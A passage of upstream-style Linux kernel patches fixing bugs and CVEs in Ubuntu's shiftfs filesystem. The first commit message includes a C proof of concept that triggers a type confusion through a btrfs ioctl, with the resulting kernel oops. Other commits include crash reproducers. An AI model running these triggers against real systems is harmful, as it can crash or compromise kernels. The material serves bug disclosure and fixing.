+ user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
+ #include <sys/ioctl.h>
+ #include <fcntl.h>
+ #include <err.h>
+ #include <unistd.h>
+ #include <linux/btrfs.h>
+ #include <sys/mman.h>
+
+ int main(void) {
+   // make our vmacache sequence number something like 0x4242
+   for (int i=0; i<0x4242; i++) {
+     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
+         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
+     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
+     munmap(x, 0x1000);
+   }
+
+   int root = open("mnt/shiftfs", O_RDONLY);
+   if (root == -1) err(1, "open shiftfs root");
+   int foofd = open("/proc/self/environ", O_RDONLY);
+   if (foofd == -1) err(1, "open foofd");
+   // trigger the confusion
+   struct btrfs_ioctl_vol_args iocarg = {
+     .fd = foofd
+   };
+   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+ }
+ user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
+ none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+ /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+ [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
+ [ 348.105060] #PF: supervisor read access in kernel mode
+ [ 348.106573] #PF: error_code(0x0000) - not-present page
+ [ 348.108102] PGD 0 P4D 0
+ [ 348.108871] Oops: 0000 [#1] SMP PTI
+ [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+ [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+ [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ [ 348.143545] Call Trace:
+ [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
+ [ 348.145562] do_vfs_ioctl+0x407/0x670
+ [ 348.146620] ? putname+0x4a/0x50
+ [ 348.147556] ksys_ioctl+0x67/0x90
+ [ 348.148514] __x64_sys_ioctl+0x1a/0x20
+ [ 348.149593] do_syscall_64+0x5a/0x130
+ [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+ [ 348.152108] RIP: 0033:0x7f77fa76767b
+ [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
+ [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
+ [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
+ [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
+ [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
+ [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
+ [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
+ [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
+ [ 348.188617] CR2: 0000000000004289
+ [ 348.189586] ---[ end trace dad859a1db86d660 ]---
+ [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ Killed
+ user@ubuntu1910vm:~/shiftfs_confuse$
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+[ saf: use f_op->open instead as special inodes in shiftfs sbs
+  will not use shiftfs open f_ops ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15792
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 33 +++++++++++++++++++--------------
+ 1 file changed, 19 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9a6a7ad50b90..897e0163005e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 	return 0;
+ }
+ 
+-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+-{
+-	struct file *realfile = file->private_data;
+-
+-	lowerfd->flags = 0;
+-	lowerfd->file = realfile;
+-
+-	/* Did the flags change since open? */
+-	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+-		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+-
+-	return 0;
+-}
+-
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+ 	struct file *realfile;
+@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
+ 	return flags;
+ }
+ 
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open &&
++	    file->f_op->open != shiftfs_dir_open)
++		return -EINVAL;
++
++	realfile = file->private_data;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
+ static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	struct file *file = iocb->ki_filp;
+-- 
+2.39.2
+
+From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 13:35:25 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
+ operations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Several locations which shift ids translate user/group ids before
+performing operations in the lower filesystem are translating
+them into init_user_ns, whereas they should be translated into
+the s_user_ns for the lower filesystem. This will result in using
+ids other than the intended ones in the lower fs, which will
+likely not map into the shifts s_user_ns.
+
+Change these sites to use shift_k[ug]id() to do a translation
+into the s_user_ns of the lower filesystem.
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15793
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
+ 1 file changed, 23 insertions(+), 20 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 897e0163005e..04fba4689eb6 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
+ 	put_cred(newcred);
+ }
+ 
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
+ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 					 const struct cred **oldcred,
+ 					 struct cred **newcred,
+ 					 struct dentry *dentry, umode_t mode,
+ 					 bool hardlink)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	if (!hardlink) {
+ 		int err = security_dentry_create_files_as(dentry, mode,
+@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 	return 0;
+ }
+ 
+-static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
+-			 kuid_t kuid)
+-{
+-	uid_t uid = from_kuid(from, kuid);
+-	return make_kuid(to, uid);
+-}
+-
+-static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
+-			 kgid_t kgid)
+-{
+-	gid_t gid = from_kgid(from, kgid);
+-	return make_kgid(to, gid);
+-}
+-
+ static void shiftfs_copyattr(struct inode *from, struct inode *to)
+ {
+ 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
+@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+ 	err = setattr_prepare(dentry, attr);
+@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 		return err;
+ 
+ 	newattr = *attr;
+-	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+-	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
+ 
+ 	/*
+ 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
+@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	/* clear all caps to prevent bypassing capable() checks */
+ 	cap_clear((*newcred)->cap_bset);
+-- 
+2.39.2
+
+From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 17 Jan 2020 16:17:06 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
+ negative during unlink
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1860041
+
+All non-special files (For shiftfs this only includes fifos and - for
+this case - unix sockets - since we don't allow character and block
+devices to be created.) go through shiftfs_open() and have their dentry
+pinned through this codepath preventing it from going negative. But
+fifos don't use the shiftfs fops but rather use the pipefifo_fops which
+means they do not go through shiftfs_open() and thus don't have their
+dentry pinned that way. Thus, the lower dentries for such files can go
+negative on unlink causing segfaults. The following C program can be
+used to reproduce the crash:
+
+ #include <stdio.h>
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <sys/types.h>
+ #include <sys/stat.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+
+ int main(int argc, char *argv[])
+ {
+        struct stat stat;
+
+        unlink("./bbb");
+
+        int ret = mknod("./bbb", S_IFIFO|0666, 0);
+        if (ret < 0)
+                exit(1);
+
+        int fd = open("./bbb", O_RDWR);
+        if (fd < 0)
+                exit(2);
+
+        if (unlink("./bbb"))
+                exit(4);
+
+        fstat(fd, &stat);
+
+        return 0;
+ }
+
+Similar to ecryptfs we need to dget() the lower dentry before calling
+vfs_unlink() on it and dput() it afterwards.
+
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 04fba4689eb6..3623d02b061e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	int err;
+ 	const struct cred *oldcred;
+ 
++	dget(lowerd);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	inode_unlock(loweri);
+ 
+ 	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 10 Apr 2020 16:55:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872094
+
+When shiftfs is nested we failed to be able to create any files or
+access directories because we recorded the wrong creator credentials. We
+need to record the credentials of the creator of the lowers mark mount
+of shiftfs. Otherwise we aren't privileged wrt to the shiftfs layer in
+the nesting case. This is similar to how we always record the user
+namespace of the base filesystem.
+
+Suggested-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3623d02b061e..5c39529d0a17 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * parent mark mountpoint.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
++			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
+@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * are identical.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+-		}
+ 
+-		cred_tmp = prepare_creds();
+-		if (!cred_tmp) {
+-			err = -ENOMEM;
+-			goto out_put_path;
++			cred_tmp = prepare_creds();
++			if (!cred_tmp) {
++				err = -ENOMEM;
++				goto out_put_path;
++			}
++			/* Don't override disk quota limits or use reserved space. */
++			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++			sbinfo->creator_cred = cred_tmp;
+ 		}
+-		/* Don't override disk quota limits or use reserved space. */
+-		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
+-		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 20 May 2020 13:44:27 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
+ from other users
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1879688
+
+Stéphane reported a bug found during NorthSec that makes heavy use of
+shiftfs. When a subvolume or snapshot is created as userns root in the
+container and then chowned to another user a delete as the root user
+will fail. The reason for this is that we drop all capabilities as a
+safety measure before calling btrfs ioctls. The only workable fix I
+could think of is to retain the CAP_DAC_OVERRIDE capability for the
+BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
+invasive.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5c39529d0a17..5d88193b41db 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
+ 	return ret;
+ }
+ 
+-static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
+@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 	cap_clear((*newcred)->cap_inheritable);
+ 	cap_clear((*newcred)->cap_permitted);
+ 
++	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
++		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
++		/*
++		 * Allow the root user in the container to remove subvolumes
++		 * from other users.
++		 */
++		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
++			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
++	}
++
+ 	put_cred(override_creds(*newcred));
+ 	return 0;
+ }
+@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	if (ret)
+ 		goto out_restore;
+ 
+-	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
+ 	if (ret)
+ 		goto out_fdput;
+ 
+-- 
+2.39.2
+
+From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Mon, 15 Jun 2020 15:16:11 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
+ fiemap definitions
+Cc: mpagano@gentoo.org
+
+shiftfs FTBFS with 5.8-rc1:
+
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
+
+It seems that shiftfs was getting linux/fiemap.h included
+indirectly before. Include it directly.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5d88193b41db..f9a5c94a9793 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -20,6 +20,7 @@
+ #include <linux/posix_acl.h>
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
++#include <linux/fiemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Tue, 23 Jun 2020 19:46:16 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
+ lookups
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872757
+
+Users reported that creating temporary files shiftfs reports ESTALE.
+This can be reproduced via:
+
+import tempfile
+import os
+
+def test():
+    with tempfile.TemporaryFile() as fd:
+        fd.write("data".encode('utf-8'))
+        # re-open the file to get a read-only file descriptor
+        return open(f"/proc/self/fd/{fd.fileno()}", "r")
+
+def main():
+   fd = test()
+   fd.close()
+
+if __name__ == "__main__":
+    main()
+
+a similar issue was reported here:
+https://github.com/systemd/systemd/issues/14861
+
+Our revalidate methods were very opinionated about whether or not a
+lower dentry was valid especially when it became unlinked we simply
+invalidated the lower dentry which caused above bug to surface. This has
+led to bugs where a ESTALE was returned for e.g.  temporary files that
+were created and directly re-opened afterwards through
+/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
+/proc/<pid>/fd/<nr> LOOKUP_JUMP is set and the vfs will revalidate via
+d_weak_revalidate(). Since the file has been unhashed or even already
+gone negative we'd fail the open when we should've succeeded.
+
+Reported-by: Christian Kellner <ckellner@redhat.com>
+Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Link: https://github.com/systemd/systemd/issues/14861
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f9a5c94a9793..3cfd1881e9a2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+-- 
+2.39.2
+
+From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 30 Dec 2020 11:10:20 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
+Cc: mpagano@gentoo.org
+
+After commit:
+
+ 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
+
+__close_fd() has been renamed to close_fd() and the files parameter has
+been removed.
+
+Change the shiftfs code to properly support this change.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3cfd1881e9a2..4f1d94903557 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	__close_fd(current->files, fd);
++	close_fd(fd);
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	/*
+ 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
+ 	 * take a reference here to offset the one which will be put by
+-	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 * close_fd(), and make sure that reference is put on fdput(lfd).
+ 	 */
+ 	get_file(lfd.file);
+ 	lfd.flags |= FDPUT_FPUT;
+-- 
+2.39.2
+
+From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:01:06 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
+ shiftfs_btrfs_ioctl_fd_replace() error paths
+Cc: mpagano@gentoo.org
+
+Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
+allocated near the top of the function. Fix up these error paths to free
+the memory.
+
+Additionally, the addresses for the allocated memory are assigned to
+return parameters early in the function, before we know whether or not
+the function as a whole will return success. Wait to assign these values
+until we know the function was successful, and for good measure
+initialize the return parameters to NULL at the start.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 28 +++++++++++++++++++++-------
+ 1 file changed, 21 insertions(+), 7 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
